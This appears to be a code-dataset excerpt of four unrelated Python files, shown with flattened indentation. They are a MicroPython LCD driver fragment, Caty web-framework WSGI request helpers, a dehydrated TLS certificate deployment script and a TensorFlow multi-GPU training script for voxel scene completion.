scale = self.fontscale
# if typed string length higher than strlen, string printing in new line
strlen = self.curWidth - 10 if strlen is None else strlen
font = self.font
X, Y = x, y
scale = 3 if scale > 3 else scale
for line in string.split('\n'):
for word in line.split(' '):
lnword = len(word)
outofd = x + lnword * (font['width'] - font['width'] // 3) * scale
if outofd >= strlen:
x = X
y += (font['height'] + 2) * scale
for i in range(lnword):
chrwidth = len(font[ord(word[i])])
self.printChar(word[i], x, y, scale = scale)
chpos = self._return_chpos(chrwidth, scale)
x += self._asm_get_charpos(chrwidth, chpos, 3)
x += self._asm_get_charpos(font['width'] // 4, chpos, 3)
x = X
y += (font['height'] + 2) * scale
class BaseImages(ILI):
# solution from forum.micropython.org
@staticmethod
@micropython.asm_thumb
def _reverse(r0, r1):
b(loopend)
label(loopstart)
ldrb(r2, [r0, 0])
ldrb(r3, [r0, 1])
strb(r3, [r0, 0])
strb(r2, [r0, 1])
add(r0, 2)
label(loopend)
sub(r1, 2)
bpl(loopstart)
@micropython.viper
def _set_image_headers(self, f):
headers = []
if f.read(2) != b'BM':
from exceptions import BMPvalidationError
raise BMPvalidationError
for pos in (10, 18, 22): # startbit, width, height
f.seek(pos)
headers.append(unpack('<H', f.read(2))[0]) # read two bytes
return headers
def _get_image_points(self, pos, width, height):
if isinstance(pos, (list, tuple)):
x, y = pos
else:
x = 0 if width == self.curWidth else (self.curWidth - width) // 2
y = 0 if height == self.curHeight else (self.curHeight - height) // 2
return x, y
def _write_from_bmp(self, f, memread):
data = bytearray(f.read(memread))
self._reverse(data, len(data))
self._write_data(data)
# Using in renderBmp method
def _render_bmp_image(self, filename, pos):
path = imgdir + '/'
memread = 512
with open(path + filename, 'rb') as f:
startbit, width, height = self._set_image_headers(f)
if width < self.curWidth:
width -= 1
x, y = self._get_image_points(pos, width, height)
self._set_window(x, (width) + x, y, (height) + y)
f.seek(startbit)
while True:
try:
data = bytearray(f.read(memread))
self._reverse(data, len(data))
self._write_data(data)
except OSError:
break
# Using in renderBmp method
def _render_bmp_cache(self, filename, pos):
filename = filename + '.' + cachedir
startbit = 8
memread = 1024 * 6
self._gcCollect()
with open(imgcachepath + '/' + filename, 'rb') as f:
width = unpack('H', f.readline())[0]
height = unpack('H', f.readline())[0]
print(filename, 'sizes:', str(width) + 'x' + str(height))
if width < self.curWidth:
width -= 1
x, y = self._get_image_points(pos, width, height)
self._set_window(x, (width) + x, y, (height) + y)
f.seek(startbit)
while True:
try:
self._write_data(f.read(memread))
except OSError:
break
self._gcCollect()
def renderBmp(self, filename, pos=None, cached=True, bgcolor=None):
self.portrait = True
self._gcCollect()
notcached = ''
if bgcolor:
self.fillMonocolor(bgcolor)
self._image_orientation()
if filename + '.' + cachedir not in os.listdir(imgcachepath):
notcached = 'not cached'
if not cached or notcached:
print(filename, imgdir[:-1], notcached)
self._render_bmp_image(filename, pos)
elif cached:
self._render_bmp_cache(filename, pos)
self._graph_orientation()
def clearImageCache(self, path):
for obj in os.listdir(path):
if obj.endswith('.' + cachedir):
os.remove(path + '/' + obj)
def cacheImage(self, image, imgdir = imgdir):
# setting portrait mode, because functionality not full at this moment
self.portrait = True
self.fillMonocolor(BLACK)
strings = self.initCh(color = DARKGREY, font = 'Arial_14')
strings.printLn("Caching:", 25, 25)
strings.printLn(image + '...', 45, 45)
memread = 60
cachedimage = image + '.' + cachedir
if cachedimage in os.listdir(imgcachepath):
os.remove(imgcachepath + '/' + cachedimage)
with open(imgdir + '/' + image, 'rb') as f:
startbit, width, height = self._set_image_headers(f)
c = open(imgcachepath + '/' + cachedimage, 'wb')
for val in [width, height]:
c.write(bytes(array('H', [val])) + b"\n")
f.seek(startbit)
data = '1'
while len(data) != 0:
try:
data = bytearray(f.read(memread))
self._reverse(data, len(data))
c.write(data)
except OSError as err:
break
c.close()
self.fillMonocolor(BLACK)
strings.printLn(image + " cached", 25, 25)
print('Cached:', image)
del(strings)
sleep(0.1)
self._gcCollect()
def cacheAllImages(self, imgdir = imgdir):
if cachedir not in os.listdir(imgdir):
os.chdir(imgdir)
os.mkdir('cache')
try:
os.chdir('/sd')
except OSError:
os.chdir('/flash')
for image in os.listdir(imgdir):
if image == cachedir: continue
self.cacheImage(image, imgdir=imgdir)
# delay for better and stable result
sleep(0.1)
class Chars(BaseChars):
def printChar(self, *args, **kwargs):
super(Chars, self).printChar(*args, **kwargs)
def printLn(self, *args, **kwargs):
super(Chars, self).printLn(*args, **kwargs)
@property
def font(self):
return self._font
@font.setter
def font(self, font):
import fonts
font = fonts.importing(font)
self._font = font
del(fonts)
@property
def fontscale(self):
return self._fontscale
@property
def portrait(self):
return self._portrait
@portrait.setter
def portrait(self, portr):
if not isinstance(portr, bool):
from exceptions import PortraitBoolError
raise PortraitBoolError
self._portrait = portr
self.setDimensions()
class BaseWidgets(BaseDraw, BaseImages):
def _charwidth_mapper(self, char):
try:
chrwidth = len(self._font[ord(char)])
chpos = self._return_chpos(chrwidth, 1) + 3 + chrwidth
return chpos
except KeyError:
return 5 if ord(char) is 32 else 0
def _get_maxstrW(self, width):
# compute max string length
return (width - 20 - self._border * 2)
def _get_widgW(self, width):
# compute widget width
return width + 20 + self._border * 2
@micropython.viper
def _get_strW(self, string):
# getting current string length
return sum(map(self._charwidth_mapper, string))
def _compute_lines(self, string, maxstrW):
words = string.split(' ')
lines = [[0,]]
i = 0
space = self._get_strW(chr(32))
for word in words:
lenw = self._get_strW(word)
if lines[i][0] + lenw >= maxstrW:
if not i and not lines[0][0]: # if first word is too large
len_bl = self._get_strW(self._blank)
assert len_bl < maxstrW, self._asserts
print(self._asserts)
return [[len_bl, self._blank]] # return '(..)'
lines.append([0, ])
i += 1
lines[i][0] += lenw + space
lines[i].append(word)
return [[line[0] - space, ' '.join(line[1:])] for line in lines]
def _get_str_structure(self, string, xy, width, height):
x, y = xy
maxW = width if width and width < self.curWidth else self.curWidth - x - 5 # max widget width
maxH = height if height and height < self.curHeight else self.curHeight - y - 5 # max widget height
border = self._border
maxstrW = self._get_maxstrW(maxW) # max string width
strwidth = self._get_strW(string) # current string width
strheight = self._font['height']
assert strheight < maxH, self._asserts
widgH = strheight + 6 + border * 2 if height is None else maxH
# setting [widgetWidth, widgetHeight, strHeight] to the structure
structure = [0, widgH, strheight]
# if width and height are defined, large string cuts to widget scale
if strwidth >= maxstrW:
structure.extend(self._compute_lines(string, maxstrW))
linen = len(structure[3:]) # structure[3:] = all lines
widgH = strheight * linen + 3 * (linen + 1) + border * 2
structure[1] = widgH if height is None else maxH
if widgH > maxH:
linen = maxH // (strheight + 3)
strheight = strheight * linen + 3 * (linen-1)
structure = structure[:linen + 3]
structure[-1][1] += self._blank
strW = self._get_strW(structure[-1][1])
if strW > maxstrW:
structure[-1][1] = self._blank
strW = self._get_strW(structure[-1][1])
structure[-1][0] = strW
print(self._asserts)
else:
strheight = widgH - 6 - border * 2
largest = max(structure[3:])[0]
structure[0] = self._get_widgW(largest) if width is None else maxW
structure[2] = strheight
else:
structure[0] = self._get_widgW(strwidth) if width is None else maxW
structure.extend([(strwidth, string)])
self._gcCollect()
return structure
def _widget(self, x, y, color, infill, string, width = None,
height = None, strobj = None, border = 1):
if strobj is None:
from exceptions import NoneStringObject
raise NoneStringObject
border = 10 if border > 10 else border
self._blank = '(..)'
self._asserts = 'widget dims too low'
self._font = strobj.font
strobj._fontscale = 1 # widget font scale always is 1
self._border = border
strheight = strobj.font['height']
structure = self._get_str_structure(string, (x, y), width, height)
lines = structure[3:]
linen = len(lines)
width, height, strheight = structure[:3]
self._gcCollect()
self.drawRect(x, y, width, height, color, border=border, infill=infill)
Y = strheight // linen if linen > 1 else 0
strY = (height - strheight) // 2 + y + 3
for line in lines:
strwidth, string = line
strX = ((width - strwidth) // 2) + x + 3
strobj.printLn(string, strX, strY)
strY += Y
x1, y1 = x + width, y + height
return x, y, x1, y1
class Widgets(BaseWidgets):
def label(self, *args, **kwargs):
super(Widgets, self)._widget(*args, **kwargs)
def button(self, *args, **kwargs):
return super(Widgets, self)._widget(*args, **kwargs)
def entry(self):
pass
class LCD(Widgets):
def reset(self):
super(LCD, self).reset()
def drawPixel(self, *args, **kwargs):
super(LCD, self).drawPixel(*args, **kwargs)
def drawVline(self, *args, **kwargs):
super(LCD, self).drawVline(*args, **kwargs)
def drawHline(self, *args, **kwargs):
super(LCD, self).drawHline(*args, **kwargs)
def drawLine(self, *args, **kwargs):
super(LCD, self).drawLine(*args, **kwargs)
def drawRect(self, *args, **kwargs):
super(LCD, self).drawRect(*args, **kwargs)
def fillMonocolor(self, *args, **kwargs):
super(LCD, self).fillMonocolor(*args, **kwargs)
def drawCircleFilled(self, *args, **kwargs):
super(LCD, self).drawCircleFilled(*args, **kwargs)
def drawCircle(self, *args, **kwargs):
super(LCD, self).drawCircle(*args, **kwargs)
def drawOvalFilled(self, *args, **kwargs):
super(LCD, self).drawOvalFilled(*args, **kwargs)
def initCh(self, **kwargs):
ch = Chars(portrait=ILI.portrait, **kwargs)
return ch
def renderBmp(self, *args, **kwargs):
super(LCD, self).renderBmp(*args, **kwargs)
def clearImageCache(self, *args, **kwargs):
super(LCD, self).clearImageCache(*args, **kwargs)
def cacheImage(self, *args, **kwargs):
super(LCD, self).cacheImage(*args, **kwargs)
def cacheAllImages(self, *args, **kwargs):
super(LCD, self).cacheAllImages(*args, **kwargs)
def label(self, *args, **kwargs):
return super(LCD, self).label(*args, **kwargs)
@property
def portrait(self):
return self._portrait
@portrait.setter
def portrait(self, portr):
if not isinstance(portr, bool):
from exceptions import PortraitBoolError
raise PortraitBoolError
self._portrait = portr
self.setDimensions()
@property
def resolution(self):
print(self.curWidth, self.curHeight)
|
<reponame>hidaruma/caty
# coding: utf-8
import xjson
from caty.core.command import Builtin
from caty.core.exception import *
import caty.jsontools as json
import caty.jsontools.stdjson as stdjson
from caty.util.collection import conditional_dict
from StringIO import StringIO
from caty.util.web import find_encoding
class MakeEnv(Builtin):
def setup(self, opts, path, query=u''):
self.__fullpath = opts['fullpath']
self.__method = opts['method'].upper()
self.__verb = opts['verb']
self.__content_type = opts['content-type']
self.__multiprocess = opts['multiprocess']
self.__multithread = opts['multithread']
self.__server_name = opts['server-name']
self.__server_port = opts['server-port']
self.__url_scheme = opts['url-scheme']
self.__query = query
self.__path = path
def execute(self, input):
self._validate_input(input)
self._fill_default_value()
if not self.__content_type:
self.__content_type = u'text/plain' if isinstance(input, unicode) else u'application/octet-stream'
chunk = self.__path.strip(u'/').split(u'/')
system = self.current_app._system
script_name = self.current_app.name
path = self.__path
istream = StringIO()
if self.__fullpath:
top = chunk.pop(0)
if top in system.app_names and top not in (u'caty', u'global'):
script_name = top
path = u'/' + u'/'.join(chunk)
else:
path = self.__path
script_name = u''
elif script_name == u'root':
script_name = u''
if isinstance(input, unicode):
input = input.encode(find_encoding(self.__content_type) or self.current_app.encoding)
length = u''
if input:
length = unicode(str(len(input)))
istream.write(input)
istream.seek(0)
verb = None
if self.__verb:
verb = u'_verb=%s' % self.__verb
query = u'&'.join([s for s in [verb, self.__query] if s])
return conditional_dict(lambda k, v: v is not None,
{u'REQUEST_METHOD': self.__method,
u'QUERY_STRING': query,
u'SCRIPT_NAME': script_name,
u'PATH_INFO': path,
u'CONTENT_TYPE': self.__content_type,
u'CONTENT_LENGTH': length,
u'SERVER_NAME': self.__server_name.split(u'//')[-1],
u'SERVER_PORT': unicode(self.__server_port),
u'SERVER_PROTOCOL': u'HTTP/1.1',
u'wsgi.input': istream,
u'wsgi.run_once': False,
u'wsgi.multithread': self.__multithread,
u'wsgi.multiprocess': self.__multiprocess,
u'wsgi.version': (1,0),
u'wsgi.url_scheme': self.__url_scheme,
})
def _validate_input(self, input):
if self.__method in (u'GET', u'HEAD', u'DELETE') and input is not None:
throw_caty_exception(u'InvalidInput', u'Input must be null')
if self.__method in (u'GET', u'HEAD', u'DELETE') and self.__content_type:
throw_caty_exception(u'InvalidInput', u'content-type can not be specified')
if self.__method in (u'PUT', u'POST') and input is None:
throw_caty_exception(u'InvalidInput', u'Input must not be null')
def _fill_default_value(self):
from caty import UNDEFINED
system = self.current_app._system
if self.__server_name is UNDEFINED:
self.__server_name = system._global_config.server_name
if self.__server_port is UNDEFINED:
self.__server_port = system._global_config.server_port
class ReqToEnv(Builtin):
def execute(self, req):
self._validate_input(req)
if not 'contentType' in req:
req['contentType'] = u'text/plain' if isinstance(req['body'], unicode) else u'application/octet-stream'
chunk = req['path'].strip(u'/').split(u'/')
path = req['path']
system = self.current_app._system
script_name = self.current_app.name
istream = StringIO()
if len(chunk) >= 2 and req['fullpath']:
top = chunk.pop(0)
if top in system.app_names and top not in (u'caty', u'global'):
script_name = top
path = u'/' + u'/'.join(chunk)
elif script_name == u'root':
script_name = u''
input = req['body']
if isinstance(input, unicode):
input = input.encode(req.get('encoding') or self.current_app.encoding)
length = u''
if input:
length = unicode(str(len(input)))
istream.write(input)
istream.seek(0)
verb = None
queries = []
if req['verb']:
verb = u'_verb=%s' % req['verb']
if req['query']:
if isinstance(req['query'], dict):
for k, v in req['query'].items():
queries.append('%s=%s' % (k, v))
else:
queries = [req['query']]
query = u'&'.join([s for s in [verb] + queries if s])
r = conditional_dict(lambda k, v: v is not None,
{u'REQUEST_METHOD': req['method'],
u'QUERY_STRING': query,
u'SCRIPT_NAME': script_name,
u'PATH_INFO': path,
u'CONTENT_TYPE': req['contentType'],
u'CONTENT_LENGTH': length,
u'SERVER_NAME': system._global_config.server_name.split(u'//')[-1],
u'SERVER_PORT': unicode(system._global_config.server_port),
u'SERVER_PROTOCOL': u'HTTP/1.1',
u'wsgi.input': istream,
u'wsgi.run_once': False,
u'wsgi.multithread': True,
u'wsgi.multiprocess': False,
u'wsgi.version': (1,0),
u'wsgi.url_scheme': u'http',
})
if req.get('cookie'):
r['cookie'] = req['cookie']
r.update(req.get('header', {}))
return r
def _validate_input(self, req):
method = req['method']
input = req['body']
if method in (u'GET', u'HEAD', u'DELETE') and input is not None:
throw_caty_exception(u'InvalidInput', u'Input must be null')
if method in (u'GET', u'HEAD', u'DELETE') and req.get('contentType'):
throw_caty_exception(u'InvalidInput', u'content-type can not be specified')
if method in (u'PUT', u'POST') and input is None:
throw_caty_exception(u'InvalidInput', u'Input must not be null')
class CallApplication(Builtin):
def setup(self, opts):
self.__no_middle = opts['no-middle']
def execute(self, environ):
environ['REMOTE_ADDR'] = u'127.0.0.1'
environ['SERVER_PORT'] = str(environ['SERVER_PORT'])
system = self.current_app._system
if self.__no_middle:
wsgi_app_cls = InternalCatyApp
else:
server_module_name = system.server_module_name
exec 'import %s as server_module' % server_module_name
wsgi_app_cls = server_module.get_app_class()
path = environ['PATH_INFO']
app_name = environ['SCRIPT_NAME'] or u'root'
del environ['SCRIPT_NAME']
app = system.get_app(app_name)
if app_name != u'root':
path = u'/%s%s' % (app_name, path) if path else u'/%s/' % app_name
environ['PATH_INFO'] = path
response_handler = ResponseHandler()
wsgi_app = system._global_config.session.wrapper(
wsgi_app_cls(app, system.debug, system),
system._global_config.session.conf)
output = wsgi_app.start(environ, response_handler.start_response)
return response_handler.make_response(output)
class ResponseHandler(object):
def __init__(self):
self.status = None
self.headers = {}
def start_response(self, status, headers, exc_info=None):
from types import StringType
assert type(status) is StringType,"Status must be a string"
assert len(status)>=4,"Status must be at least 4 characters"
assert int(status[:3]),"Status message must begin w/3-digit code"
assert status[3]==" ", "Status message must have a space after code"
for name,val in headers:
assert type(name) is StringType,"Header names must be strings"
assert type(val) is StringType,"Header values must be strings"
self.status = status
for a, b in headers:
self.headers[a] = unicode(b)
return self.make_response
def make_response(self, data):
return {
u'status': int(self.status.split(' ')[0]),
u'header': self.headers,
u'body': ''.join(data)
}
class ProcessEnv(Builtin):
def execute(self, environ):
system = self.current_app._system
server_module_name = system.server_module_name
exec 'import %s as server_module' % server_module_name
handler = server_module.get_handler_class()(None)
return handler.process_env(environ)
class Perform(Builtin):
def execute(self, environ):
environ['REMOTE_ADDR'] = u'127.0.0.1'
environ['SERVER_PORT'] = str(environ['SERVER_PORT'])
system = self.current_app._system
wsgi_app_cls = InternalCatyApp
path = environ['PATH_INFO']
app_name = environ['SCRIPT_NAME'] or u'root'
del environ['SCRIPT_NAME']
app = system.get_app(app_name)
if app_name != u'root':
path = u'/%s%s' % (app_name, path) if path else u'/%s/' % app_name
environ['PATH_INFO'] = path
environ['caty.session'] = system._global_config.session.storage.create_session(environ)
wsgi_app = wsgi_app_cls(app, system.debug, system)
return wsgi_app.main(environ)
class Lookup(Builtin):
def execute(self, environ):
system = self.current_app._system
environ['REMOTE_ADDR'] = u'127.0.0.1'
environ['SERVER_PORT'] = str(environ['SERVER_PORT'])
app_name = environ['SCRIPT_NAME'] or u'root'
del environ['SCRIPT_NAME']
app = system.get_app(app_name)
oldpath = environ['PATH_INFO']
if app_name != u'root':
path = u'/%s%s' % (app_name, oldpath) if oldpath else u'/%s/' % app_name
else:
path = oldpath
environ['PATH_INFO'] = path
environ['caty.session'] = system._global_config.session.storage.create_session(environ)
wsgi_app = InternalCatyApp(app, system.debug, system)
entry, input = wsgi_app.get_action_and_input(environ)
environ['PATH_INFO'] = oldpath
return {
u'app': app_name,
u'setEnv': environ,
u'clearEnv': True,
u'callable': entry.canonical_name,
u'arg0': oldpath,
u'input': input
}
from caty.front.web.app import CatyApp, HTTP_STATUS
class InternalCatyApp(CatyApp):
def _end_proc(self, json, headers, start_response):
status = 200
status = HTTP_STATUS[json.get('status', 200)]
start_response(status, headers)
if 'body' in json:
b = json['body']
return [b]
else:
return []
def get_action_and_input(self, environ):
from caty.core.handler import RequestHandler
path = environ['PATH_INFO']
query = self._get_query(environ)
raw_input = environ['wsgi.input'].read(int(environ['CONTENT_LENGTH'] or 0))
input, options, method, environ = self._process_env(raw_input, query, environ)
if method not in (u'POST', u'PUT'):
input = None
facilities = self._app.create_facilities(lambda : environ['caty.session'])
del environ['PATH_INFO'] # init_envで生PATH_INFOを使わせない
if self._system.wildcat:
self._app.init_env(facilities, self.is_debug, [u'web', u'test'], self._system, environ)
else:
self._app.init_env(facilities, self.is_debug, [u'web'], self._system, environ)
handler = RequestHandler(facilities['interpreter'],
facilities['env'],
self._app)
path, _ = handler._create_path_and_vpath(path)
entry = handler._verb_dispatcher.get(handler._file, path, options.pop('_verb', u''), environ['REQUEST_METHOD'], False)
return entry.resource_class_entry, input
class MapException(Builtin):
def execute(self, e):
from caty.core.handler import ErrorDispacher
from caty.core.exception import CatyException
return ErrorDispacher(self.i18n).dispatch_error(CatyException(e.tag, **e.value))
class MapSignal(Builtin):
def execute(self, e):
from caty.core.handler import ErrorDispacher
return ErrorDispacher(self.i18n).dispatch_signal(e)
|
#!/usr/bin/env python
"""
Copyright (c) 2016-2021 <NAME>
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
"""
import os
import sys
import shutil
import filecmp
import subprocess
import yaml
# Define letsencrypt.sh defaults
LETSENCRYPT_ROOT = '/etc/dehydrated/certs/{domain}/{pem}.pem'
# Set user config file path
CONFIG_FILE = os.path.join(os.path.expanduser('~'), '.config', 'dehydrated', 'deploy.conf')
# Set generic error message template
ERROR = ' + ERROR: Could not locate {name} files:\n\t{files}'
def parse_config():
"""Parse the user config file."""
print(f'# INFO: Using deployment config file {CONFIG_FILE}')
# Make sure file exists
if not os.path.exists(CONFIG_FILE):
sys.exit(ERROR.format(name='deployment config', files=CONFIG_FILE))
# Parse YAML config file
return yaml.load(open(CONFIG_FILE, 'r'))
def deploy_file(file_type, old_file, new_file):
"""Deploy new file and store old file."""
if filecmp.cmp(old_file, new_file):
print(f' + WARNING: {old_file} matches new {file_type}, skipping deployment')
return False
# Get old file information
stat = os.stat(old_file)
# Rename existing file
os.rename(old_file, f'{old_file}.bak')
# # Copy new file
shutil.copy(new_file, old_file)
# Update file ownership
os.chown(old_file, stat.st_uid, stat.st_gid)
# Update file permissions
os.chmod(old_file, stat.st_mode)
print(f' + Successfully deployed new {file_type} to {old_file}')
return True
def deploy_domain(domain, config):
"""Deploy new certs for a given domain."""
print(f'Deploying new files for: {domain}')
deployed = False
# Deploy new certs for each location
for location in config:
# Loop through file types
for file_type in location.keys():
# Get the new version of this file
new_file = LETSENCRYPT_ROOT.format(domain=domain, pem=file_type)
# Make sure it exists
if not os.path.exists(new_file):
sys.exit(ERROR.format(name=f'new {file_type}', files=new_file))
# Get the old version
old_file = location[file_type]
# Make sure it exists
if not os.path.exists(old_file):
sys.exit(ERROR.format(name=f'old {file_type}', files=old_file))
# Deploy new file
deploy_success = deploy_file(file_type, old_file, new_file)
# Set deploy status
if deploy_success:
deployed = True
return deployed
def run_deployment():
"""Main wrapper function."""
print('Starting new file deployment')
# Get user deploy config
config = parse_config()
# Monitor for new deployments
saw_new_deployments = False
# Iterate over domains
for domain in config['domains'].keys():
# Deploy new files for the domain
deployed = deploy_domain(domain, config['domains'][domain])
if deployed:
saw_new_deployments = True
# Only run post-deployment actions if we saw new deploys
if saw_new_deployments:
# Run post deployment actions
print('Starting post-deployment actions')
for action in config['post_actions']:
print(f' + Attempting action: {action}')
try:
# Attempt action
status = subprocess.call(action, shell=True)
# Return result
print(f' + Action exited with status {status}')
except OSError as error:
# Catch errors
print(f' + ERROR: {error}')
print('New file deployment done.')
if __name__ == '__main__':
run_deployment()
|
<reponame>yuxiaoguo/VVNet
# MSRA Internal Graphics
#
"""
Examples:
"""
import os
import logging
import tensorflow as tf
import models
from scripts import dataset
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
def loss(logit, label, depth, scene_info, categories=12, scope='loss'):
with tf.name_scope(scope) as _:
label, indices = models.network.Network.optional_label(label, depth, scene_info)
if indices is not None:
logit = tf.reshape(logit, [-1, 12])
logit = tf.gather_nd(logit, indices)
label = tf.cast(label, tf.float32)
label = tf.gather_nd(label, indices)
label = tf.cast(label, tf.int32)
label_oh = tf.one_hot(label, categories)
cross_entropy = tf.nn.softmax_cross_entropy_with_logits(labels=label_oh, logits=logit, name='ce_vox')
cross_entropy_mean = tf.reduce_mean(cross_entropy, name='ce_mean')
return cross_entropy_mean
def average_gradient(tower_grads):
average_grads = []
for grad_and_vars in zip(*tower_grads):
grads = []
for g, _ in grad_and_vars:
expanded_g = tf.expand_dims(g, 0)
grads.append(expanded_g)
grad = tf.concat(grads, axis=0)
grad = tf.reduce_mean(grad, 0)
v = grad_and_vars[0][1]
grad_and_var = (grad, v)
average_grads.append(grad_and_var)
return average_grads
def average_losses(tower_losses):
losses = []
for tower_loss in tower_losses:
expand_loss = tf.expand_dims(tower_loss, 0)
losses.append(expand_loss)
average_loss = tf.concat(losses, axis=0)
average_loss = tf.reduce_mean(average_loss, 0)
return average_loss
def train_phase_network(net, args):
logging.info('=====train network definition=====')
# data
training_data_dir = args.input_training_data_path
data_records = [item for item in os.listdir(training_data_dir) if item.endswith('.tfrecord')]
train_records = [os.path.join(training_data_dir, item) for item in data_records if item.find('train') != -1]
logging.info('available training resource: %s', train_records)
batch_size = args.batch_per_device * args.input_gpu_nums
reader = dataset.SceneReader(train_records, shuffle=True, batch_size=batch_size, num_threads=20)
logging.info('batch size for reader: %s', batch_size)
# optimizer
global_step = tf.Variable(0, trainable=False, name='global_step')
starter_lr = 0.01
lr_scheme = tf.train.exponential_decay(starter_lr, global_step, 100000, 0.1, staircase=True)
opt = tf.train.MomentumOptimizer(lr_scheme, 0.9)
data, label = net.cook_raw_inputs(reader)
net_instance = net(False, True)
with tf.name_scope('multiple_gpus'):
gpu_num = args.input_gpu_nums
gpu_depth = tf.split(data[0], gpu_num, axis=0)
gpu_normal = tf.split(data[1], gpu_num, axis=0)
gpu_scene_info = tf.split(data[2], gpu_num, axis=0)
gpu_label = tf.split(label, gpu_num, axis=0)
gpu_data = [item for item in zip(gpu_depth, gpu_normal, gpu_scene_info)]
tower_grads = []
tower_losses = []
with tf.variable_scope(tf.get_variable_scope()):
gpu_id = 0
for data, label in zip(gpu_data, gpu_label):
with tf.device('/gpu:%s' % gpu_id):
with tf.name_scope('tower_%s' % gpu_id) as _:
logit = net_instance.instance(data)
train_loss = loss(logit, label, data[0], data[2], scope='loss')
tf.get_variable_scope().reuse_variables()
tower_grads.append(opt.compute_gradients(train_loss))
tower_losses.append(train_loss)
gpu_id += 1
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(update_ops):
grads = average_gradient(tower_grads)
train_loss = average_losses(tower_losses)
apply_gradient_op = opt.apply_gradients(grads, global_step=global_step)
train_op = tf.group(apply_gradient_op)
summary_lr_scheme = tf.summary.scalar('learning_rate', lr_scheme)
average_train_loss = tf.placeholder(tf.float32, name='average_train_loss')
summary_train_loss = tf.summary.scalar('train_ce', average_train_loss)
train_merged = tf.summary.merge([summary_train_loss, summary_lr_scheme])
return train_merged, average_train_loss, train_loss, train_op
def test_phase_network(net, args):
logging.info('=====test network definition=====')
# data
validation_data_dir = args.input_validation_data_path
data_records = [item for item in os.listdir(validation_data_dir) if item.endswith('.tfrecord')]
test_records = [os.path.join(validation_data_dir, item) for item in data_records if item.find('test') != -1]
logging.info('available training resource: %s', test_records)
batch_size = args.batch_per_device
num_samples = sum(1 for _ in tf.python_io.tf_record_iterator(test_records[0]))
test_iters = int(num_samples / batch_size) + 1
reader = dataset.SceneReader(test_records, shuffle=False, batch_size=batch_size, num_threads=10)
logging.info('batch size for reader: %s', batch_size)
net_instance = net(True, False)
data, label = net.cook_raw_inputs(reader)
logit = net_instance.instance(data)
test_loss = loss(logit, label, data[0], data[2], scope='test_loss')
mean_test_loss = tf.placeholder(tf.float32, name='average_test_loss')
summary_test_loss = tf.summary.scalar('test_ce', mean_test_loss)
test_merged = tf.summary.merge([summary_test_loss])
return test_merged, mean_test_loss, test_loss, test_iters
def train_network(args):
# network choice
net = models.NETWORK[args.input_network]
ckpt = tf.train.latest_checkpoint(args.output_model_path)
start_iters = 0 if not ckpt else int(ckpt[ckpt.find('iter') + 4:-5])
# train & test targets
train_summary, average_train_loss, train_loss, train_op = train_phase_network(net, args)
test_summary, average_test_loss, test_loss, test_iters = test_phase_network(net, args)
# saver
tf_saver = tf.train.Saver(max_to_keep=600)
config = tf.ConfigProto(allow_soft_placement=True, log_device_placement=True)
logging.info('=====start training=====')
with tf.Session(config=config) as sess:
# tf summary
train_writer = tf.summary.FileWriter(os.path.join(args.log_dir, 'train'), sess.graph)
# initialize
init = tf.global_variables_initializer()
sess.run(init)
if ckpt:
tf_saver.restore(sess, ckpt)
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(coord=coord)
# start training
avg_train_loss = 0.
for i in range(start_iters, args.max_iters):
if (i + 1) % args.record_iters == 0:
avg_loss = 0.
for test_iter in range(test_iters):
iter_test_loss = sess.run(test_loss)
avg_loss += iter_test_loss
avg_loss /= test_iters
summary = sess.run(test_summary, feed_dict={average_test_loss: avg_loss})
train_writer.add_summary(summary, i)
logging.info('test iters %d: %f', i, avg_loss)
if (i + 1) % 100 == 0 and i != start_iters:
avg_train_loss /= 100
summary = sess.run(train_summary, feed_dict={average_train_loss: avg_train_loss})
train_writer.add_summary(summary, i)
logging.info('train iters %d: %f', i, avg_train_loss)
avg_train_loss = 0
if (i + 1) % args.record_iters == 0:
tf_saver.save(sess, os.path.join(args.output_model_path, 'model_iter%06d.ckpt' % i))
iter_train_loss, _ = sess.run([train_loss, train_op])
avg_train_loss += iter_train_loss
# finished training
coord.request_stop()
coord.join(threads)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.